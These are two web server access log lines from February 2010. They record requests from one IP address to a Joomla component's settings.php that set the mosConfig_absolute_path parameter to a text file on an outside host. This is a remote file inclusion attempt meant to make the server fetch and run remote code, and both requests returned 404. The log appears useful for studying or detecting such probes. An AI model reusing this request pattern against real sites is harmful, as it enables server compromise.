89.221.175.32 - - [18/Feb/2010:05:59:30 -0800] "GET /logs/access_100203.log/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [18/Feb/2010:05:59:30 -0800] "GET /administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
